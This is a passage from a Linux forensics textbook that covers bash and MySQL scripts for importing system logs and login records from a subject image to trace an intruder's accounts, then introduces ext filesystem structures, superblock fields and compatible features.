Recall that these logs fall into three basic categories. Some have absolutely no time information, others give seconds since boot, while others give proper dates and times. Because of this it is normally not possible to build a timeline of log entries. The general syntax for a query of a single log file is select logentry from logs where logfilename like '%<log file>%' order by recno;, e.g. select logentry from logs where logfilename like '%auth%' order by recno;. Partial results from this query are shown in Figure 6.23. Notice that the creation of the bogus johnn user and modifications to the lightdm and whoopsie accounts are clearly shown in this screenshot.
FIGURE 6.23
Evidence of the attacker's actions from log files.
If you are uncertain what logs have been imported, the query select distinct logfilename from logs; will list all of the log files captured. If you are not sure what kind of information is in a particular log, run a query. One of the nice things about this method is that it is so quick and easy to look at any of the logs without having to navigate a maze of directories.
Several of these logs, such as apt/history.log, apt/term.log, and dpkg.log, provide information on what has been installed via standard methods. It is quite possible that even a savvy attacker might not clean their tracks in all of the relevant log files. It is certainly worth a few minutes of your time to browse through a sampling of these logs.
EXAMINING LOGINS AND LOGIN ATTEMPTS
As discussed in the previous section, most of the system logs are text files. Two exceptions to this norm are the btmp and wtmp binary files which store failed logins and login session information, respectively. Earlier in this book, when we were talking about live response, we introduced the last and lastb commands which display information from wtmp and btmp, respectively.
Like all good Linux utilities, these two commands support a number of command line options. The command last -Faiwx will produce a full listing (-F), append (-a) the IP address for remote logins (-i), use the wide format (-w), and include extra information (-x), such as when a user changed the run level. Running this command will provide information contained within the current wtmp file only. What if you want to view older information, perhaps because the current file is only a couple days old? For this and other reasons, last allows you to specify a file using the -f option.
The results of running last against the current and most recent archive wtmp are shown in Figure 6.24. This is a good example of why you should look at the archived wtmp (and btmp) files as well. The current wtmp file contains only three days of information, but the archive file has an additional month of data.
FIGURE 6.24
Running the last command on the current and most recent archive wtmp files.
Not surprisingly, we can create a script that will import the logins and failed login attempts into our database. Because these files tend to be smaller than some other logs and they can contain valuable information, the script presented here loads not only the current files but also any archives. A few new techniques can be found in the script that follows.
#!/bin/bash
#
# get-logins.sh
#
# Simple script to get all successful and unsuccessful
# login attempts and optionally store them in a database.
#
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

usage () {
  echo "usage: $0 <mount point of root> [database name]"
  echo "Simple script to get logs of successful "
  echo "and unsuccessful logins."
  echo "Results may be optionally stored in a database"
  exit 1
}

if [[ $# -lt 1 ]] ; then
  usage
fi

# use the last and lastb commands to display information
# use awk to create ; separated fields
# use sed to strip white space
echo "who-what;terminal-event;start;stop;elapsedTime;ip" \
  | tee /tmp/logins.csv
for logfile in $1/var/log/wtmp*
do
  last -aiFwx -f $logfile | \
  awk '{print substr($0, 1, 8) ";" substr($0, 10, 13) ";" \
    substr($0, 23, 24) ";" substr($0, 50, 24) ";" substr($0, 75, 12) \
    ";" substr($0, 88, 15)}' \
  | sed 's/[[:space:]]*;/;/g' | sed 's/[[:space:]]+\n/\n/' \
  | tee -a /tmp/logins.csv
done

echo "who-what;terminal-event;start;stop;elapsedTime;ip" \
  | tee /tmp/login-fails.csv
for logfile in $1/var/log/btmp*
do
  lastb -aiFwx -f $logfile | \
  awk '{print substr($0, 1, 8) ";" substr($0, 10, 13) ";" \
    substr($0, 23, 24) ";" substr($0, 50, 24) ";" substr($0, 75, 12) \
    ";" substr($0, 88, 15)}' \
  | sed 's/[[:space:]]*;/;/g' | sed 's/[[:space:]]+\n/\n/' \
  | tee -a /tmp/login-fails.csv
done

if [ $# -gt 1 ] ; then
  chown mysql:mysql /tmp/logins.csv
  chown mysql:mysql /tmp/login-fails.csv
  cat << EOF | mysql $2 -u root -p
create table logins (
  who_what varchar(8),
  terminal_event varchar(13),
  start datetime,
  stop datetime,
  elapsed varchar(12),
  ip varchar(15),
  recno bigint not null auto_increment,
  primary key(recno)
);
load data infile "/tmp/logins.csv"
  into table logins
  fields terminated by ';'
  enclosed by '"'
  lines terminated by '\n'
  ignore 1 rows
  (who_what, terminal_event, @start, @stop, elapsed, ip)
  set start=str_to_date(@start, "%a %b %e %H:%i:%s %Y"),
  stop=str_to_date(@stop, "%a %b %e %H:%i:%s %Y");
create table login_fails (
  who_what varchar(8),
  terminal_event varchar(13),
  start datetime,
  stop datetime,
  elapsed varchar(12),
  ip varchar(15),
  recno bigint not null auto_increment,
  primary key(recno)
);
load data infile "/tmp/login-fails.csv"
  into table login_fails
  fields terminated by ';'
  enclosed by '"'
  lines terminated by '\n'
  ignore 1 rows
  (who_what, terminal_event, @start, @stop, elapsed, ip)
  set start=str_to_date(@start, "%a %b %e %H:%i:%s %Y"),
  stop=str_to_date(@stop, "%a %b %e %H:%i:%s %Y");
EOF
fi
This script starts out in the usual way and is quite simple right up until the line for logfile in $1/var/log/wtmp*. This is our first new item. The bash shell supports a number of variations of a for loop. Readers familiar with C and similar programming languages have seen for loops that are typically used to iterate over a list where the number of iterations is known beforehand and an integer is incremented (or decremented) with each step in the loop. Bash supports those types of loops and also allows a loop to be created that iterates over files that match a pattern.
The pattern in our for loop will match the login log file (wtmp) and any archives of the same. The do on the next line begins the code block for the loop and done seven lines later terminates it. The last command is straightforward, but the same cannot be said of the series of pipes that follow. As usual, it is easier to understand the code if you break this long command down into its subparts.
We have seen awk, including the use of positional parameters such as $0 and $1, in previous scripts. The substr function is new, however. The format for substr is substr(<some string>, <starting index>, <max length>). For example, substr("Hello there", 1, 4) would return "Hell". Notice that indexes are 1-based, not 0-based as in many other languages and programs. Once you understand how substr works, it isn't difficult to see that this somewhat long awk command is printing six fields of output from last separated by semicolons. In order these fields are to whom or what this entry refers, the terminal or event for this entry, start time, stop time, elapsed time, and IP address.
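The fixed-width slicing performed by the awk command can be mimicked in Python, which makes the 1-based versus 0-based difference easy to see. This is only a sketch: the substr helper below handles starting indexes of 1 or more, the sample line is synthetic and built to match the column positions used in the script, and real output from last may place columns differently depending on the version installed.

```python
def substr(s, start, length):
    """awk-style substr for start >= 1: 1-based start index and at most
    `length` characters."""
    return s[start - 1:start - 1 + length]


# (start, length) pairs taken from the awk command in get-logins.sh.
COLUMNS = [(1, 8), (10, 13), (23, 24), (50, 24), (75, 12), (88, 15)]


def split_last_line(line):
    """Cut one line of `last -aiFwx` output into its six fixed-width fields."""
    return [substr(line, start, length) for start, length in COLUMNS]


# Synthetic line laid out to match the column positions above.
sample = (
    "john".ljust(8) + " " + "pts/1".ljust(13)
    + "Mon Mar  9 21:33:55 2015" + " - " + "Mon Mar  9 21:40:00 2015"
    + " " + "(00:06)".ljust(12) + " " + "192.168.56.1"
)

print(substr("Hello there", 1, 4))
print(";".join(split_last_line(sample)))
```

The joined output still carries padding before most of the semicolons, which is the problem the sed commands in the script are meant to clean up.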
There is still a small problem with the formatted output from last. Namely, there is likely a bunch of whitespace in each entry before the semicolons. This is where sed, the stream editor, comes in. One of the most popular commands in sed is the substitution command which has a general format of s/<search pattern>/<replacement pattern>/<options>. While "/" is the traditional separator used, the user may use a different character ("#" is a common choice) if desired. The translation of sed 's/[[:space:]]*;/;/g' is search for zero or more whitespace characters before a semicolon, if you find them substitute just a semicolon, and do this globally (g option) which in this context means do not stop with the first match on each line. The second sed command, sed 's/[[:space:]]+\n/\n/', is intended to remove whitespace from the end of each line (the IP field). The code for processing btmp (failed logins) parallels the wtmp code.
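The effect of the two substitutions can be reproduced with Python's re module for experimentation. This is a hedged sketch: clean_record is an invented name, and rstrip is used for the end-of-line cleanup as a stand-in for the second sed command rather than a literal translation of it.

```python
import re


def clean_record(line):
    """Remove padding before each semicolon, then trailing whitespace.

    re.sub replaces every match by default, which corresponds to the
    g option of the sed substitution command.
    """
    line = re.sub(r"\s*;", ";", line)
    return line.rstrip()


padded = "john    ;pts/1        ;(00:06)     ;192.168.56.1   "
print(clean_record(padded))
```

Whitespace inside a field, such as the spaces within a timestamp, is left alone because the pattern only matches whitespace that is immediately followed by a semicolon.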
The database code is similar to what we have used before. Once again, the only small complication is formatting the date and time information output by last and lastb into a MySQL datetime object. Some of the output from running this script against the PFE subject system is shown in Figure 6.25. Note that last and lastb generate an empty line and a message stating when the log file was created. This results in bogus entries in your database. My philosophy is that it is better to ignore these entries than to add considerable complication to the script to prevent their creation.
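The date conversion can be tried outside the database. The sketch below assumes the full timestamp layout that last -F prints (weekday, month, day, time, year) and an English locale; the MySQL specifiers %e, %i, and %s correspond roughly to %d, %M, and %S in Python. The function name and the sample footer text are invented for this illustration.

```python
from datetime import datetime

# Python counterpart of the MySQL format string "%a %b %e %H:%i:%s %Y".
LAST_FORMAT = "%a %b %d %H:%M:%S %Y"


def parse_last_timestamp(text):
    """Return a datetime for a full `last -F` timestamp, or None when the
    text does not match (as happens with blank and footer lines)."""
    try:
        return datetime.strptime(text.strip(), LAST_FORMAT)
    except ValueError:
        return None


print(parse_last_timestamp("Mon Mar  9 21:33:55 2015"))
print(parse_last_timestamp("wtmp begins Fri Feb 27 2015"))
print(parse_last_timestamp(""))
```

Lines that fail to parse play the same role here as the bogus entries described above: they can simply be ignored.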
FIGURE 6.25
Output from running logins and failed login attempts script. Note that there are a couple of empty entries and erroneous lines that follow.
The query select * from logins order by start; will list login sessions and select * from login_fails order by start; will display failed login attempts. Some of the results from these queries are shown in Figure 6.26. In the figure it can be seen that the attacker failed to log in remotely from IP address 192.168.56.1 as lightdm on 2015-03-09 21:33:55. Around that same time the john, johnn, and lightdm accounts had successful logins from the same IP address. The attacker appears to be testing some newly created accounts.
FIGURE 6.26
Login sessions and failed login attempts.
OPTIONAL – GETTING ALL THE LOGS
Earlier in this chapter we discussed importing the current log files into MySQL. We ignored the archived logs to save space and also because they may be uninteresting. For those that wish to grab everything, I offer the following script.
#!/bin/bash
#
# get-logfiles-ext.sh
#
# Simple script to get all logs and optionally
# store them in a database.
# Warning: This script might take a long time to run!
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.
#
# This is an extended version of get-logfiles.sh.
# It will attempt to load current logs and archived logs.
# This could take a long time and require lots of storage.

usage () {
  echo "usage: $0 <mount point of root> [database name]"
  echo "Simple script to get log files and"
  echo "optionally store them to a database."
  exit 1
}

if [ $# -lt 1 ] ; then
  usage
fi

# remove old file if it exists
if [ -f /tmp/logfiles.csv ] ; then
  rm /tmp/logfiles.csv
fi

olddir=$(pwd)
cd $1/var
for logfile in $(find log -type f -name '*')
do
  # compressed archives are expanded with zcat before being prefixed
  if echo $logfile | egrep -q '\.gz$' ; then
    zcat $logfile | awk "{ print \"$logfile;\" \$0 }" \
      | tee -a /tmp/logfiles.csv
  else
    awk "{ print \"$logfile;\" \$0 }" $logfile \
      | tee -a /tmp/logfiles.csv
  fi
done
cd "$olddir"

if [ $# -gt 1 ] ; then
  chown mysql:mysql /tmp/logfiles.csv
  clear
  echo "Let's put that in the database"
  cat << EOF | mysql $2 -u root -p
create table if not exists logs (
  logFilename varchar(2048) not null,
  logentry varchar(2048) not null,
  recno bigint not null auto_increment,
  primary key(recno)
);
load data infile "/tmp/logfiles.csv"
  into table logs
  fields terminated by ';'
  enclosed by '"'
  lines terminated by '\n';
EOF
fi
If you decide to go this route you will want to modify your queries slightly. In particular, you will want to add "order by logFilename desc, recno" to your select statement in order to present things in chronological order. For example, to query all logs you would use select * from logs order by logfilename desc, recno. To examine a particular logfile use select logfilename, logentry from logs where logfilename like '%<base log filename>%' order by logfilename desc, recno, e.g., select logfilename, logentry from logs where logfilename like '%syslog%' order by logfilename desc, recno.
SUMMARY
In this chapter we have learned to extract information from a mounted subject filesystem or filesystems. Many techniques were presented for analyzing this data in LibreOffice and/or a database such as MySQL. In the next chapter we will dig into Linux extended filesystems which will allow us, among other things, to detect data that has been altered by an attacker.
CHAPTER 7
Extended Filesystems
INFORMATION IN THIS CHAPTER:
Organization of extended filesystems
Superblocks
Compatible, incompatible, and read-only features
Group descriptors
Inodes
New features in ext4
Using Python to read filesystem structures
Using shell scripting to find out of place files
Detecting alteration of metadata by an attacker
EXTENDED FILESYSTEM BASICS
Running Linux allows you to have lots of choices. This includes your choice of filesystems. That said, some version of the Linux extended filesystem is found on the vast majority of Linux systems. These are commonly referred to as extN filesystems, where N is the version in use (normally 2, 3, or 4). The ext2 filesystem is popular for partitions that don't change often such as boot partitions. Most Linux distributions use ext4 by default on general use filesystems such as /, /home, /usr, /opt, etc.
A natural question to ask is what is the extended filesystem extended from? The answer is the Unix File System (UFS). While the extN family is an extension of UFS, it is also a simplification. Some of the features in UFS were no longer relevant to modern media, so they were removed to simplify the code and improve performance. The extN family is meant to be robust with good performance.
There is a reason that ext2 is normally reserved for static filesystems. Both ext3 and ext4 are journaling filesystems, but ext2 is a non-journaling filesystem. What's a journal? In this context it isn't a chronicling of someone's life occurrences. Rather journaling is used to both improve performance and reduce the chances of data corruption.
Here is how a journaling filesystem works. Writes to the media are not done immediately, rather the requested changes are written to a journal. You can think of these updates like transactions in a database. When a command returns it means that either the entire transaction was completed (all of the data was written or updated) in which case it returns success or the filesystem was returned to its previous state if the command could not be completed successfully. In the event that the computer was not shut down cleanly, the journal can be used to return things to a consistent state. Having a journaling filesystem significantly speeds up the filesystem check (fsck) process.
Extended filesystems store information in blocks which are organized into block groups. The blocks are normally 1024, 2048, or 4096 bytes in size. Most media you are likely to encounter use 512 byte sectors. As a result, blocks are 2, 4, or 8 sectors long. For readers familiar with the FAT and NTFS filesystems, a block in Unix or Linux is roughly equivalent to a cluster in DOS or Windows. The block is the smallest allocation unit for disk space.
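The arithmetic in the preceding paragraph is simple enough to check by hand, but a short sketch makes the relationships explicit. The function names are invented for this example, and the 512 byte sector size is the common case mentioned above rather than a universal constant.

```python
SECTOR_SIZE = 512  # bytes; the common case, not a guarantee


def sectors_per_block(block_size, sector_size=SECTOR_SIZE):
    """Number of sectors that make up one filesystem block."""
    if block_size % sector_size:
        raise ValueError("block size must be a multiple of the sector size")
    return block_size // sector_size


def blocks_needed(file_size, block_size):
    """Blocks allocated for a file of file_size bytes. Because the block is
    the smallest allocation unit, the result is rounded up."""
    return (file_size + block_size - 1) // block_size


for size in (1024, 2048, 4096):
    print(size, sectors_per_block(size))

# Even a one byte file occupies a whole block.
print(blocks_needed(1, 4096), blocks_needed(4097, 4096))
```

The rounding in blocks_needed is also why the space a file occupies on disk is usually somewhat larger than its logical size.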
A generic picture of the block groups is shown in Figure 7.1. Keep in mind that not every element shown will be present in each block group. We will see later in this chapter that the ext4 filesystem is highly customizable. Some elements may be moved or eliminated from certain groups to improve performance.
We will describe each of the elements in Figure 7.1 in detail later in this chapter. For now, I will provide some basic definitions of these items. The boot block is just what it sounds like, boot code for the operating system. This might be unused on a modern system, but it is still required to be there for backward compatibility. A superblock describes the filesystem and tells the operating system where to find various elements (inodes, etc.). Group descriptors describe the layout of each block group. Inodes (short for index nodes) contain all the metadata for a file except for its name. Data blocks are used to store files and directories. The bitmaps indicate which inodes and data blocks are in use.
FIGURE 7.1
Generic block group structure. Note that some components may be omitted from a block group depending on the filesystem version and features.
The extended filesystem allows for optional features. The features fall into three categories: compatible, incompatible, and read-only compatible. If an operating system does not support a compatible feature, the filesystem can still be safely mounted. Conversely, if an operating system lacks support for an incompatible feature, the filesystem should not be mounted. When an operating system doesn't provide a feature on the read-only compatible list, it is still safe to mount the filesystem, but only if it is attached as read-only. Something to keep in mind if you ever find yourself examining a suspected attacker's computer is that he or she might be using non-standard extended features.
The Sleuth Kit (TSK) by Brian Carrier is a set of tools for filesystem analysis. One of these tools, fsstat, allows you to collect filesystem (fs) statistics (stat). By way of warning, this tool appears to be somewhat out of date and may not display all of the features of your latest version ext4 filesystem correctly. Don't worry, we will develop some up-to-date scripts later in this chapter that will properly handle the latest versions of ext4 as of this writing (plus you will have Python code that you could update yourself if required).
In order to use fsstat you must first know the offset to the filesystem inside your image file. Recall that we learned in Chapter 5 that the fdisk tool could be used to determine this offset. The syntax for this command is simply fdisk <image file>. As we can see in Figure 7.2, the filesystem in our PFE subject image begins at sector 2048.
FIGURE 7.2
Using fdisk to determine the offset to the start of a filesystem.
Once the offset is determined, the command to display filesystem statistics is just fsstat -o <offset> <image file>, e.g., fsstat -o 2048 pfe1.img. Partial results from running this command against our PFE subject image are shown in Figure 7.3 and Figure 7.4. The results in Figure 7.3 reveal that we have a properly unmounted ext4 filesystem that was last mounted at / with 1,048,577 inodes and 4,194,048 4 kB blocks. Compatible, incompatible, and read-only compatible features are also shown in this screenshot. From Figure 7.4 we can see there are 128 block groups with 8,192 inodes and 32,768 blocks per group. We also see statistics for the first two block groups.
FIGURE 7.3
Result of running fsstat – part 1.
FIGURE 7.4
Results of running fsstat – part 2.
SUPERBLOCKSNowthatwehaveahigh levelviewof theextendedfilesystem,wewilldrilldowninto
eachofitsmajorcomponents,startingwiththesuperblock.Thesuperblockis1024byteslong and begins 1024 bytes (2 sectors) into the partition right after the boot block. Bydefault thesuperblock is repeated in thefirstblockofeachblockgroup,but thiscanbechangedbyenablingvariousfilesystemfeatures.
Some readers may be familiar with the BIOS parameter blocks and extended BIOS parameter blocks in FAT and NTFS boot sectors. On Windows systems the parameters in those blocks contain all the information the operating system requires in order to read files from the disk. The superblock performs a similar function for Linux systems. Information contained in the superblock includes
Block size
Total blocks
Number of blocks per block group
Reserved blocks before the first block group
Total number of inodes
Number of inodes per block group
The volume name
Last write time for the volume
Last mount time for the volume
Path where the filesystem was last mounted
Filesystem status (whether or not cleanly unmounted)
When examining a filesystem it can be convenient to use a hex editor that is made specifically for this purpose. One such editor is Active@ Disk Editor by Lsoft. It is freely available and there is a version for Linux (as well as one for Windows). The Active@ Disk Editor (ADE) may be downloaded from http://disk-editor.org. ADE has several nice features, including templates for interpreting common filesystem structures such as superblocks and inodes. The subject system’s superblock is shown in ADE in Figure 7.5. We will cover the fields in Figure 7.5 in detail later in this chapter during our discussion of various filesystem features. For the moment, I feel I should point out that the block size (offset 0x18 in the superblock) is stored as x, where the block size in bytes = 2^(10 + x) = 1024 * 2^x. For example, the stored block size of 2 equates to a 4 kB (4096 byte) block. Table 7.1 summarizes all of the fields that may be present in a superblock as of this writing. The material in Table 7.1 primarily comes from the header file /usr/src/<linux version>/fs/ext4/ext4.h.
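The block size formula can be checked with a couple of lines of Python. This is only a sketch; the function name is invented for illustration. It also shows a pitfall worth remembering: in Python the caret (^) is bitwise XOR, not exponentiation, so powers of two should be written with ** or a left shift.

```python
def block_size_from_log(log_block_size):
    """Block size in bytes = 2^(10 + x) = 1024 * 2^x."""
    return 1024 << log_block_size

for stored in range(0, 4):
    print(stored, block_size_from_log(stored))

# The caret is XOR in Python, so this is NOT 2 to the 12th power.
print(2 ^ 12, 2 ** 12)
```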
Table 7.1. Superblock field summary.
Offset  Size  Name                  Description
0x0     4     inodecount            Total inode count.
0x4     4     blockcountlo          Total block count.
0x8     4     rblockcountlo         This number of blocks can only be allocated by the super-user.
0xC     4     freeblockcountlo      Free block count.
0x10    4     freeinodecount        Free inode count.
0x14    4     firstdatablock        First data block.
0x18    4     logblocksize          Block size is 2^(10 + logblocksize).
0x1C    4     logclustersize        Cluster size is 2^logclustersize.
0x20    4     blockpergroup         Blocks per group.
0x24    4     clusterpergroup       Clusters per group, if bigalloc is enabled.
0x28    4     inodepergroup         Inodes per group.
0x2C    4     mtime                 Mount time, in seconds since the epoch.
0x30    4     wtime                 Write time, in seconds since the epoch.
0x34    2     mntcount              Number of mounts since the last fsck.
0x36    2     maxmntcount           Number of mounts beyond which a fsck is needed.
0x38    2     magic                 Magic signature, 0xEF53.
0x3A    2     state                 Filesystem state.
0x3C    2     errors                Behavior when detecting errors.
0x3E    2     minorrevlevel         Minor revision level.
0x40    4     lastcheck             Time of last check, in seconds since the epoch.
0x44    4     checkinterval         Maximum time between checks, in seconds.
0x48    4     creatoros             Creator OS. Probably 0 = Linux.
0x4C    4     revlevel              Revision level. One of: 0 or 1.
0x50    2     defresuid             Default uid for reserved blocks.
0x52    2     defresgid             Default gid for reserved blocks.
0x54    4     firstino              First non-reserved inode.
0x58    2     inodesize             Size of inode structure, in bytes.
0x5A    2     blockgroupnr          Block group # of this superblock.
0x5C    4     featurecompat         Compatible feature set flags.
0x60    4     featureincompat       Incompatible feature set.
0x64    4     featurerocompat       Read-only compatible feature set.
0x68    byte  uuid[16]              128-bit UUID for volume.
0x78    char  volumename[16]        Volume label.
0x88    char  lastmounted[64]       Directory where filesystem was last mounted.
0xC8    4     algorithmusagebitmap  For compression (not used in e2fsprogs/Linux).
0xCC    byte  preallocblocks        Blocks to preallocate for files.
0xCD    byte  preallocdirblocks     Blocks to preallocate for directories.
0xCE    2     reservedgdtblocks     Number of reserved GDT entries.
0xD0    byte  journaluuid[16]       UUID of journal superblock.
0xE0    4     journalinum           Inode number of journal file.
0xE4    4     journaldev            Device number of journal file.
0xE8    4     lastorphan            Start of list of orphaned inodes to delete.
0xEC    4     hashseed[4]           HTREE hash seed.
0xFC    byte  defhashversion        Default hash algorithm to use for directories.
0xFD    byte  jnlbackuptype         Journal backup type.
0xFE    2     descsize              Size of group descriptors.
0x100   4     defaultmountopts      Default mount options.
0x104   4     firstmetabg           First metablock block group.
0x108   4     mkftime               When the filesystem was created.
0x10C   4     jnlblocks[17]         Backup copy of the journal inode’s iblock[].
0x150   4     blockcounthi          High 32 bits of the block count.
0x154   4     rblockcounthi         High 32 bits of the reserved block count.
0x158   4     freeblockcounthi      High 32 bits of the free block count.
0x15C   2     minextraisize         All inodes have at least # bytes.
0x15E   2     wantextraisize        New inodes should reserve # bytes.
0x160   4     flags                 Miscellaneous flags.
0x164   2     raidstride            RAID stride.
0x166   2     mmpinterval           Seconds to wait in multi-mount prevention.
0x168   8     mmpblock              Block # for multi-mount protection data.
0x170   4     raidstripewidth       RAID stripe width.
0x174   byte  loggroupperflex       Flexible block group size = 2^loggroupperflex.
0x175   byte  checksumtype          Metadata checksum algorithm type.
0x176   2     reservedpad           Alignment padding.
0x178   8     kbytewritten          KB written to this filesystem ever.
0x180   4     snapshotinum          Inode number of active snapshot.
0x184   4     snapshotid            Sequential ID of active snapshot.
0x188   8     snapshotrblockcount   Number of blocks reserved for active snapshot.
0x190   4     snapshotlist          Inode number of the head of the snapshot list.
0x194   4     errorcount            Number of errors seen.
0x198   4     firsterrortime        First time an error happened.
0x19C   4     firsterrorino         Inode involved in first error.
0x1A0   8     firsterrorblock       Number of the block involved in the first error.
0x1A8   byte  firsterrorfunc[32]    Name of function where the error happened.
0x1C8   4     firsterrorline        Line number where error happened.
0x1CC   4     lasterrortime         Time of most recent error.
0x1D0   4     lasterrorino          Inode involved in most recent error.
0x1D4   4     lasterrorline         Line number where most recent error happened.
0x1D8   8     lasterrorblock        Number of the block involved in most recent error.
0x1E0   byte  lasterrorfunc[32]     Name of function for most recent error.
0x200   byte  mountopts[64]         ASCIIZ string of mount options.
0x240   4     usrquotainum          Inode number of user quota file.
0x244   4     grpquotainum          Inode number of group quota file.
0x248   4     overheadblocks        Overhead blocks/clusters in fs.
0x24C   4     backupbgs[2]          Block groups containing superblock backups.
0x254   byte  encryptalgos[4]       Encryption algorithms in use.
0x258   4     reserved[105]         Padding to the end of the block.
0x3FC   4     checksum              Superblock checksum.
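To show how the offsets in Table 7.1 translate into code, here is a minimal sketch that pulls a handful of fields out of a raw superblock with struct.unpack_from. The function name, the dictionary keys, and the sample values are all invented for illustration; the superblock is synthetic rather than taken from a real image. The high 32 bits of the block count are only combined with the low half when the 64Bit incompatible feature (0x80) is set.

```python
import struct

INCOMPAT_64BIT = 0x80   # 64Bit flag in the incompatible feature set

def parse_basic_fields(sb):
    """Pull a handful of Table 7.1 fields out of a raw superblock."""
    fields = {
        'inode count':      struct.unpack_from('<L', sb, 0x0)[0],
        'block count lo':   struct.unpack_from('<L', sb, 0x4)[0],
        'log block size':   struct.unpack_from('<L', sb, 0x18)[0],
        'blocks per group': struct.unpack_from('<L', sb, 0x20)[0],
        'inodes per group': struct.unpack_from('<L', sb, 0x28)[0],
        'magic':            struct.unpack_from('<H', sb, 0x38)[0],
        'incompat':         struct.unpack_from('<L', sb, 0x60)[0],
        'block count hi':   struct.unpack_from('<L', sb, 0x150)[0],
    }
    total = fields['block count lo']
    if fields['incompat'] & INCOMPAT_64BIT:
        total |= fields['block count hi'] << 32
    fields['total blocks'] = total
    fields['block size'] = 1024 << fields['log block size']
    return fields

# Synthetic superblock with made-up values, for demonstration only.
sb = bytearray(1024)
struct.pack_into('<L', sb, 0x0, 1048576)
struct.pack_into('<L', sb, 0x4, 4194304)
struct.pack_into('<L', sb, 0x18, 2)
struct.pack_into('<L', sb, 0x20, 32768)
struct.pack_into('<L', sb, 0x28, 8192)
struct.pack_into('<H', sb, 0x38, 0xEF53)
parsed = parse_basic_fields(bytes(sb))
print(parsed['block size'], parsed['total blocks'], hex(parsed['magic']))
```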
When using Active@ Disk Editor I recommend that you open each volume by selecting “Open in Disk Editor” as shown in Figure 7.6. This creates a new tab with a logical view of your filesystem. This logical view is more convenient than the raw physical view because, among other things, it will automatically apply some of the built-in templates. If you ever use this tool with Windows filesystems it will also translate clusters to sectors for you.
FIGURE 7.6
Opening a logical view of a volume in Active@ Disk Editor.
EXTENDED FILESYSTEM FEATURES
As previously mentioned, the extended filesystem supports a number of optional features. These are grouped into compatible, incompatible, and read-only compatible features. Details of these various types of features are presented below.
You may be wondering why a forensic examiner should care about features. This is certainly a fair question. There are a number of reasons why this is relevant to forensics. First, these features may affect the structure of block groups. Second, this in turn affects where data is located. Third, features affect how data is stored. For example, depending on the features used some data may be stored in inodes versus its usual location in data blocks. Fourth, some features might result in a new source of metadata for use in your analysis.
Compatible Features
Compatible features are essentially nice-to-haves. In other words, if you support this feature, that is great, but if not, feel free to mount a filesystem using them as readable and writable. While you may mount this filesystem, you should not run the fsck (filesystem check) utility against it as you might break things associated with these optional features. The compatible features list as of this writing is summarized in Table 7.2.
Table 7.2. Compatible Features.
Bit    Name           Description
0x1    DirPrealloc    Directory preallocation
0x2    Imagicinodes   Only the Shadow knows
0x4    HasJournal     Has a journal (Ext3 and Ext4)
0x8    ExtAttr        Supports Extended Attributes
0x10   ResizeInode    Has reserved Group Descriptor Table entries for expansion
0x20   DirIndex       Has directory indices
0x40   LazyBG         Support for uninitialized block groups (not common)
0x80   ExcludeInode   Not common
0x100  ExcludeBitmap  Not common
0x200  SparseSuper2   If set, superblock backup_bgs points to 2 BG with SB backup
The first feature in Table 7.2 is Directory Preallocation. When this feature is enabled the operating system should preallocate some space whenever a directory is created. This is done to prevent fragmentation of the directory, which enhances performance. While this can be useful, it is easy to see why it is okay to mount the filesystem even if the operating system does not support this optimization.
Bit 2 (value of 0x04) is set if the filesystem has a journal. This should always be set for ext3 and ext4 filesystems. This is a compatible feature because it is (somewhat) safe to read and write a filesystem even if you are not writing through a journal to do so.
Bit 3 (value of 0x08) is set if the filesystem supports extended attributes. The first use of extended attributes was Access Control Lists (ACL). Other types of extended attributes, including user-specified, are also supported. We will learn more about extended attributes later in this chapter.
When the Resize Inode feature is in use, each block group containing group descriptors will have extra space for future expansion of the filesystem. Normally a filesystem can grow to 1024 times its current size, so this feature can result in quite a bit of empty space in the group descriptor table. As we will see later in this chapter, enabling certain features eliminates the storing of group descriptors in every block group.
Directories are normally stored in a flat format (simple list of entries) in extended filesystems. This is fine when directories are small, but can lead to sluggish performance with larger directories. When the Directory Index feature is enabled some or all directories may be indexed to speed up searches.
Normally when an extended filesystem is created, all of the block groups are initialized (set to zeros). When the Lazy Block Group feature is enabled, a filesystem can be created without properly initializing the metadata in the block groups. This feature is uncommon, as are the Exclude Inode and Exclude Bitmap features.
In a generic extended filesystem the superblock is backed up in every single block group. There are a number of features that can be used to change this behavior. Modern media are considerably more reliable than their predecessors. As a result, it makes little sense to waste disk space with hundreds of superblock backups. When the Sparse Super 2 feature is enabled the only superblock backups are in two block groups listed in an array in the superblock.
Now that we have learned about all the compatible features, we might ask which features affect the layout of our data. The two features in this category that affect the filesystem layout are Resize Inode and Sparse Super 2, which add reserved space in group descriptor tables and cause backup superblocks to be removed from all but two block groups, respectively.
How can you get enabled features and other information from a live Linux extended filesystem? Not surprisingly there are a number of tools available. The first tool is the stat (statistics) command which is normally used on files, but may also be used on filesystems. The syntax for running this command on a normal file is stat <filename>, i.e., stat *.mp3. The results of running stat on some MP3 files are shown in Figure 7.7. To run stat on a filesystem the command is stat -f <mount point>, i.e., stat -f /. The output from stat -f / run on my laptop is shown in Figure 7.8. Note that the filesystem ID, type, block size, total/free/available blocks, and total/free inodes are displayed.
FIGURE 7.7
Running the stat command on regular files.
FIGURE 7.8
Running the stat command on a filesystem.
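Much of what stat -f reports is also available from Python through os.statvfs, which may be handy when filesystem statistics need to feed into another script. The sketch below is an illustration only: the function name and dictionary keys are invented here, it uses Python 3 print syntax, and it assumes a Unix-like system. Unlike stat -f, it does not name the filesystem type.

```python
import os

def filesystem_stats(mount_point):
    """Collect block and inode totals for a mounted filesystem."""
    st = os.statvfs(mount_point)
    return {
        'block size': st.f_bsize,
        'fragment size': st.f_frsize,
        'total blocks': st.f_blocks,
        'free blocks': st.f_bfree,
        'available blocks': st.f_bavail,
        'total inodes': st.f_files,
        'free inodes': st.f_ffree,
        'max name length': st.f_namemax,
    }

for name, value in sorted(filesystem_stats('/').items()):
    print(name + ':', value)
```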
Like the stat command, the file command can be applied to files or filesystems. When run against files the file command will display the file type. Note that Linux is much smarter than Windows when it comes to deciding what to do with files. Linux will look inside the file for a file signature while Windows will stupidly use nothing but a file’s extension to determine how it is handled. The results of running file on the MP3 files from Figure 7.7 are shown in Figure 7.9. When run against a disk device the -s (special files) and -L (dereference links) options should be used. Figure 7.10 shows the results of running file -sL /dev/sd* on my laptop.
FIGURE 7.9
Output of file command when run against regular files.
FIGURE 7.10
Output of file command when run against hard disk device files.
From Figure 7.10 it can be seen that my Linux volume has journaling (not surprising as it is an ext4 filesystem), uses extents, and supports large and huge files. These features will be described in more detail later in this chapter.
